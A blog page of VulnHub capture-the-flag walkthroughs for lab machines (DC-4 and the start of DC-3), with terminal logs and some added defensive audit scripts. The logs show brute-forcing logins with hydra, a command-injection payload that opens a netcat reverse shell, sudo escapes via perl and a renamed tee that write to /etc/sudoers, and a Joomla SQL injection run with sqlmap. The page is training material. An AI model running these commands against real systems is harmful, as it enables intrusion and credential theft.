Process 3741 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$

We got a shell after running the Metasploit exploit module. Let's now enumerate the system to find a way to elevate our privileges.

www-data@Dina:/var/www/SecreTSMSgatwayLogin$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudoedit
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/arping
/usr/bin/X
/usr/bin/chfn
/usr/sbin/pppd
/usr/sbin/uuidd
/bin/ping6
/bin/umount
/bin/mount
/bin/ping
/bin/su
/bin/fusermount
www-data@Dina:/var/www/SecreTSMSgatwayLogin$

The find command for SUID binaries didn't come back with anything interesting, so let's try sudo -l.

www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l 
sudo -l
Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ 
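
All three boxes in these posts fall to the same class of misconfiguration: a NOPASSWD or unrestricted sudo rule on a program that can hand back a shell or write arbitrary files (ed on Sunset, ALL and cp on Matrix, perl here). The audit below is an added example, not from the original posts; it parses `sudo -l` output (the three listings above, copied from the page) and flags rules an administrator should remove or tighten. The sets of risky programs are illustrative, not exhaustive.

```python
import re
from typing import List, Tuple

# Constructed combined input: the three sudo -l listings from these posts,
# copied from the page.
SUDO_L_OUTPUTS = {
    "sunset": r"""Matching Defaults entries for sunset on sunset:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunset may run the following commands on sunset:
    (root) NOPASSWD: /usr/bin/ed
""",
    "guest": r"""User guest may run the following commands on porteus:
    (ALL) ALL
    (root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
    (trinity) NOPASSWD: /bin/cp
""",
    "www-data": r"""Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/perl
""",
}

# Illustrative subsets: editors, pagers and interpreters that can start a
# subprocess, and tools that write files as the run-as user.
SHELL_CAPABLE = {"ed", "vi", "vim", "nano", "less", "more", "man",
                 "perl", "python", "python3", "ruby", "awk", "find", "bash", "sh"}
FILE_WRITE_CAPABLE = {"cp", "mv", "tee", "dd", "tar"}

# "(runas) [TAG: ...] command" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+?)\s*$")

Finding = Tuple[str, str, str, str]   # (severity, runas, command, why)


def audit_sudo_l(output: str) -> List[Finding]:
    """Return one finding per rule in `sudo -l` output that grants an easy escalation."""
    findings: List[Finding] = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True          # rules follow; Defaults lines above are skipped
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, cmd = m.group("runas"), m.group("cmd")
        nopasswd = "NOPASSWD:" in m.group("tags")
        target = "any user" if runas == "ALL" else runas
        prog = cmd.split()[0].rsplit("/", 1)[-1]
        if cmd == "ALL":
            findings.append(("critical", runas, cmd,
                             f"unrestricted sudo: any command runs as {target}"))
        elif prog in SHELL_CAPABLE:
            why = f"{prog} can spawn a shell as {target}" + (" without a password" if nopasswd else "")
            findings.append(("critical" if nopasswd else "high", runas, cmd, why))
        elif prog in FILE_WRITE_CAPABLE:
            findings.append(("high", runas, cmd, f"{prog} can overwrite files owned by {target}"))
    return findings


if __name__ == "__main__":
    for host_user, text in SUDO_L_OUTPUTS.items():
        for sev, runas, cmd, why in audit_sudo_l(text):
            print(f"[{sev}] {host_user}: ({runas}) {cmd}: {why}")
```

The fix is the same on all three hosts: drop the rule, or restrict it to a wrapper script that performs the one intended action and cannot be escaped to a shell.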

The user www-data can run the perl binary via sudo with no password. We issue a simple perl one-liner and break out into a root shell.

www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo perl -e 'exec("/bin/sh -i");'
sudo perl -e 'exec("/bin/sh -i");'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root
# 

Now that we have root, all that is left to do is cat the flag.txt.

# cd /root
cd /root
# ls -la
ls -la
total 52
drwx------  6 root root 4096 Oct 17  2017 .
drwxr-xr-x 23 root root 4096 Oct 17  2017 ..
-rw-------  1 root root 2466 Oct 17  2017 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwxr-xr-x  3 root root 4096 Oct 17  2017 .cache
drwxr-xr-x  3 root root 4096 Oct 17  2017 .config
drwxr-xr-x  3 root root 4096 Oct 17  2017 .local
-rw-------  1 root root   55 Oct 17  2017 .mysql_history
-rw-------  1 root root    9 Oct 17  2017 .nano_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
drwx------  2 root root 4096 Nov 15 08:13 .pulse
-rw-------  1 root root  256 Oct 17  2017 .pulse-cookie
-rw-r--r--  1 root root  639 Oct 17  2017 flag.txt
# cat flag.txt
cat flag.txt
________                                                _________
\________\--------___       ___         ____----------/_________/
    \_______\----\\\\\\   //_ _ \\    //////-------/________/
        \______\----\\|| (( ~|~ )))  ||//------/________/
            \_____\---\\ ((\ = / ))) //----/_____/
                 \____\--\_)))  \ _)))---/____/
                       \__/  (((     (((_/
                          |  -)))  -  ))


root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....


CONGO.........
FLAG : 22d06624cd604a0626eb5a2992a6f2e6



# 

Monday, November 11, 2019

VulnHub: DC-4 Walkthrough

First we start off with an Nmap scan of the remote host.

root@ubuntu:~# nmap -sC -sV -O -T5 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-02 10:18 MDT
Nmap scan report for dc-2 (192.168.56.101)
Host is up (0.00061s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (EdDSA)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 08:00:27:B3:AB:48 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds
root@ubuntu:~# 

Nmap came back with two ports open, 22 and 80. Let's fire up nikto and see what it finds on the server.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        80
+ Start Time:         2019-11-02 10:21:32 (GMT-6)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie PHPSESSID created without the httponly flag
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7946 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2019-11-02 10:21:46 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto didn't find anything interesting. Let's run dirb against the remote host and cross our fingers.

root@ubuntu:~/src/nikto/program# dirb http://192.168.56.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov  2 10:23:52 2019
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/css/
==> DIRECTORY: http://192.168.56.101/images/
+ http://192.168.56.101/index.php (CODE:200|SIZE:506)

---- Entering directory: http://192.168.56.101/css/ ----

---- Entering directory: http://192.168.56.101/images/ ----

-----------------
END_TIME: Sat Nov  2 10:23:55 2019
DOWNLOADED: 13836 - FOUND: 1
root@ubuntu:~/src/nikto/program# 

Dirb didn't come back with anything interesting either. If we visit the index page we are greeted with an admin login page. If we capture the login request with Burp we get the POST string that the form submits to login.php:

username=admin&password=password

We can use hydra with that POST string to try and brute-force the admin login.

root@ubuntu:~# hydra -l admin -P /home/sam/wordlists/1000-most-common-passwords.txt 192.168.56.101 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 10:53:24
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1002 login tries (l:1/p:1002), ~63 tries per task
[DATA] attacking http-post-form://192.168.56.101:80//login.php:username=^USER^&password=^PASS^:S=logout
[80][http-post-form] host: 192.168.56.101   login: admin   password: happy
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 10:53:28
root@ubuntu:~# 
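From the defender's side the run above is loud: hydra sends about a thousand POSTs to /login.php from one client in four seconds, which stands out in the nginx access log. The script below is an added example written for this page, not code from the original post; it counts POST /login.php requests per client per minute over constructed sample log lines, and the combined log format and the 20-per-minute threshold are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): spot a login brute-force like the
# hydra run against /login.php by counting POSTs per client per minute.
# Assumes nginx "combined" log lines, e.g.
#   192.168.56.1 - - [02/Nov/2019:10:53:24 -0600] "POST /login.php HTTP/1.0" 200 506 "-" "UA"

# make_sample_log: writes a constructed sample log to a temp file and prints its
# path: 25 POSTs to /login.php from one client inside one minute, plus two
# ordinary requests from another client.
make_sample_log() {
    f=$(mktemp)
    i=0
    while [ "$i" -lt 25 ]; do
        printf '192.168.56.1 - - [02/Nov/2019:10:53:%02d -0600] "POST /login.php HTTP/1.0" 200 506 "-" "Mozilla/5.0"\n' \
            "$((24 + i / 10))" >> "$f"
        i=$((i + 1))
    done
    printf '192.168.56.50 - - [02/Nov/2019:10:53:30 -0600] "GET /index.php HTTP/1.1" 200 506 "-" "Mozilla/5.0"\n' >> "$f"
    printf '192.168.56.50 - - [02/Nov/2019:10:53:31 -0600] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"\n' >> "$f"
    echo "$f"
}

# detect_login_bruteforce LOGFILE THRESHOLD
# Prints "client dd/Mon/yyyy:HH:MM count" for every client/minute bucket with
# more than THRESHOLD POSTs to /login.php; prints nothing when there is none.
detect_login_bruteforce() {
    awk -v thr="$2" '
        $6 == "\"POST" && $7 == "/login.php" {
            # $4 looks like [02/Nov/2019:10:53:24 ; keep the part up to the minute
            minute = substr($4, 2, 17)
            count[$1 " " minute]++
        }
        END {
            for (k in count)
                if (count[k] > thr) print k, count[k]
        }' "$1" | sort
}
```

Point it at a real access log with `detect_login_bruteforce /var/log/nginx/access.log 20` and every client/minute pair over the threshold is printed.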

Hydra finds a valid username and password combination, so let's log in and see what we have.

Once logged in we can see that the page allows us to run commands. If we capture the request with Burp we get the following:

radio=ls+l&submit=Run

We can insert our own commands into the radio parameter of the request and, for instance, read back the source code of the page that runs them:

command.php
<?php
// Vulnerable as found on the box: the 'radio' POST parameter is passed straight
// to the shell without any validation, so whatever is sent in it runs as www-data.
$my_cmd = $_POST['radio'];
//echo $my_cmd;
$output = shell_exec($my_cmd);
print $output;

If we use it to execute a reverse shell we get a connection back to our local machine:

radio=nc+-e+/bin/sh+192.168.56.1+4444&submit=Run
root@ubuntu:~# nc -l -v -p 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from dc-4 59178 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)           
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ 

We cat the /etc/passwd file and find some users on the system.

www-data@dc-4:/usr/share/nginx/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
www-data@dc-4:/usr/share/nginx/html$

We found 4 users on the system.

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

If we change into jim's home directory and list its contents we find some interesting results.

www-data@dc-4:/home$ cd jim
cd jim
www-data@dc-4:/home/jim$ ls -la
ls -la
total 32
drwxr-xr-x 3 jim  jim  4096 Apr  7  2019 .
drwxr-xr-x 5 root root 4096 Apr  7  2019 ..
-rw-r--r-- 1 jim  jim   220 Apr  6  2019 .bash_logout
-rw-r--r-- 1 jim  jim  3526 Apr  6  2019 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6  2019 .profile
drwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups
-rw------- 1 jim  jim   528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh
www-data@dc-4:/home/jim$ 

We see two files, mbox and test.sh. If we cat the contents of test.sh we find:

www-data@dc-4:/home/jim$ cat test.sh
cat test.sh
#!/bin/bash
for i in {1..5}
do
 sleep 1
 echo "Learn bash they said."
 sleep 1
 echo "Bash is good they said."
done
 echo "But I'd rather bash my head against a brick wall."
www-data@dc-4:/home/jim$ 

So there is nothing interesting about the test.sh file itself, but if we search for SUID programs we see that it does indeed have the SUID bit set:

www-data@dc-4:/home/jim$ find / -xdev -perm -4000 -type f 2>/dev/null
find / -xdev -perm -4000 -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh
www-data@dc-4:/home/jim$ 

If we move on to the backups directory we find a file called old-passwords.bak, which we will use to brute-force SSH. We copy old-passwords.bak to our local computer and run hydra against SSH with jim as the username.

root@ubuntu:~/src/nikto/program# hydra -l jim -P /home/sam/old-pass.txt ssh://192.168.56.101
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2019-11-02 11:27:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101   login: jim   password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2019-11-02 11:28:43
root@ubuntu:~/src/nikto/program# 

Hydra found a valid username and password combination, so now it's time to log in as jim and see what we can do.

root@ubuntu:~/src/nikto/program# ssh jim@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:vtcgdCXO4d3KmnjiIIkH1Een5F1AiSx3qp0ABgwdvww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
jim@192.168.56.101's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ 

We notice the login banner says we have mail. If we run strings on the mbox file we see that it is an email with its headers:

jim@dc-4:~$ strings mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCiQe-0000gc-EC
 for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: root 
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO
This is a test.
jim@dc-4:~$ 

Let's check /var/mail/jim and read our mail.

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls -la
total 12
drwxrwsr-x  2 root mail 4096 Apr  6  2019 .
drwxr-xr-x 12 root root 4096 Apr  5  2019 ..
-rw-rw----  1 jim  mail  715 Apr  6  2019 jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: 
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
 (envelope-from )
 id 1hCjIX-0000kO-Qt
 for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: 
From: Charles 
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/mail$ 

We now have another username and password for an account on the box, so let's su to charles and see what he can do.

jim@dc-4:/var/mail$ su charles
Password: 
charles@dc-4:/var/mail$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)
charles@dc-4:/var/mail$ 

charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$ 

We are able to run /usr/bin/teehee as root without a password, and it is just the tee program renamed. Since tee writes its input to any file, we can append a rule for charles to /etc/sudoers and then sudo su.

charles@dc-4:~$ echo "charles ALL=(ALL:ALL) ALL" | sudo /usr/bin/teehee /etc/sudoers
charles ALL=(ALL:ALL) ALL
charles@dc-4:~$ sudo su

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for charles: 
root@dc-4:/home/charles# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-4:/home/charles# whoami
root
root@dc-4:/home/charles# cd /root
root@dc-4:~# ls
flag.txt
root@dc-4:~# cat flag.txt



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:~# 
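Two local weaknesses carried this box: a SUID file that anyone could edit (test.sh, -rwsrwxrwx) and a passwordless sudo rule on a renamed copy of tee (/usr/bin/teehee). The script below is an added example written for this page, not code from the original post; it audits a filesystem tree for writable SUID files and a sudoers file for NOPASSWD commands, identifying a renamed binary by comparing it byte for byte with known tools. It assumes POSIX find, awk, sed and cmp, and the list of file-writing tools it compares against is an assumption.

```shell
#!/bin/sh
# Added defender's checks (not from the original post) for the two local
# weaknesses used on this box: a SUID file that anyone can edit (test.sh,
# -rwsrwxrwx) and a NOPASSWD sudo rule on a renamed copy of a file-writing
# tool (/usr/bin/teehee, which is tee). Assumes POSIX find/awk/sed and cmp.

# audit_writable_suid ROOT
# Prints SUID regular files under ROOT that group or others can write to;
# whoever can edit such a file controls what runs with the owner's privileges.
audit_writable_suid() {
    find "$1" -xdev -type f -perm -4000 \( -perm -020 -o -perm -002 \) 2>/dev/null | sort
}

# list_nopasswd_rules SUDOERS
# Prints "user commands" for every NOPASSWD rule in a sudoers file, with
# comments stripped so commented-out rules are not reported.
list_nopasswd_rules() {
    sed 's/#.*//' "$1" | awk '
        /NOPASSWD:/ {
            split($0, parts, "NOPASSWD:")
            cmds = parts[2]
            gsub(/^[ \t]+|[ \t]+$/, "", cmds)
            print $1, cmds
        }'
}

# identify_binary FILE
# Compares FILE byte for byte with tools on PATH that can write files or run
# arbitrary commands (the list is an assumption) and prints the first match;
# a renamed copy such as teehee is still byte-identical to tee. Returns 1 if none.
identify_binary() {
    for name in tee cp dd mv sh bash vi vim nano python3 perl; do
        path=$(command -v "$name" 2>/dev/null) || continue
        if cmp -s "$1" "$path"; then
            echo "$name"
            return 0
        fi
    done
    return 1
}

# audit_sudoers SUDOERS
# For every command in a NOPASSWD rule, print "user command real-tool" so a
# renamed binary is reported under its true name ("unknown" if no match).
audit_sudoers() {
    list_nopasswd_rules "$1" | while read -r user cmds; do
        echo "$cmds" | tr ',' '\n' | while read -r cmd; do
            cmd=${cmd%% *}          # keep the path, drop any arguments
            [ -n "$cmd" ] || continue
            real=$(identify_binary "$cmd" || echo unknown)
            echo "$user $cmd $real"
        done
    done
}
```

On a real host run `audit_writable_suid /` and `audit_sudoers /etc/sudoers` as root; on DC-4 the first would list /home/jim/test.sh and the second would report /usr/bin/teehee as tee.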

Friday, November 1, 2019

VulnHub: DC-3 Walkthrough

We first start off with an nmap scan on the remote host.

root@ubuntu:~/src# nmap -p- -T5 192.168.56.102

Starting Nmap 7.60 ( https://nmap.org ) at 2019-11-01 13:24 MDT
Warning: 192.168.56.102 giving up on port because retransmission cap hit (2).
Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 13:27 (0:00:00 remaining)
Nmap scan report for symfonos.local (192.168.56.102)
Host is up (0.00073s latency).
Not shown: 65529 closed ports
PORT      STATE    SERVICE
80/tcp    open     http
MAC Address: 08:00:27:1C:53:6A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 185.63 seconds
root@ubuntu:~/src#

Nmap came back with only port 80 open. Our next task is to fire up Nikto and run it against the host.

root@ubuntu:~/src/nikto/program# ./nikto.pl -host 192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        80
+ Start Time:         2019-11-01 13:28:46 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.39). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017 for details.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /administrator/: This might be interesting.
+ OSVDB-3092: /bin/: This might be interesting.
+ OSVDB-3092: /includes/: This might be interesting.
+ OSVDB-3092: /tmp/: This might be interesting.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8757 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2019-11-01 13:29:50 (GMT-6) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@ubuntu:~/src/nikto/program# 

Nikto came back with some interesting results. We check some of the directories in the output and find that this server is running the Joomla CMS. We hit the site with joomscan next, which tells us the version is Joomla 3.7.0. We move on to searchsploit to see if there are any exploits for this version of Joomla.

root@ubuntu:~/src/exploitdb# ./searchsploit joomla 3.7.0
------------------------------------------------------------------------------------------------------------- -------------------------------------------
 Exploit Title                                                                                               |  Path
                                                                                                             | (/home/sam/src/exploitdb/)
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection                                                                   | exploits/php/webapps/42033.txt
------------------------------------------------------------------------------------------------------------- -------------------------------------------
Shellcodes: No Result
root@ubuntu:~/src/exploitdb# 

There is one exploit available for this version of Joomla. If we read the exploit file we find the following:

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

The exploit file gives instructions for running sqlmap against the host, so we use its example:

./sqlmap.py -u "http://192.168.56.102/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

[13:52:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[13:52:22] [INFO] fetching database names
[13:52:23] [INFO] used SQL query returns 5 entries
[13:52:23] [INFO] retrieved: 'information_schema'
[13:52:23] [INFO] retrieved: 'joomladb'
[13:52:23] [INFO] retrieved: 'mysql'
[13:52:23] [INFO] retrieved: 'performance_schema'
[13:52:23] [INFO] retrieved: 'sys'
available databases [5]:

We found 5 databases on the server; next we extract the tables of the joomladb database.

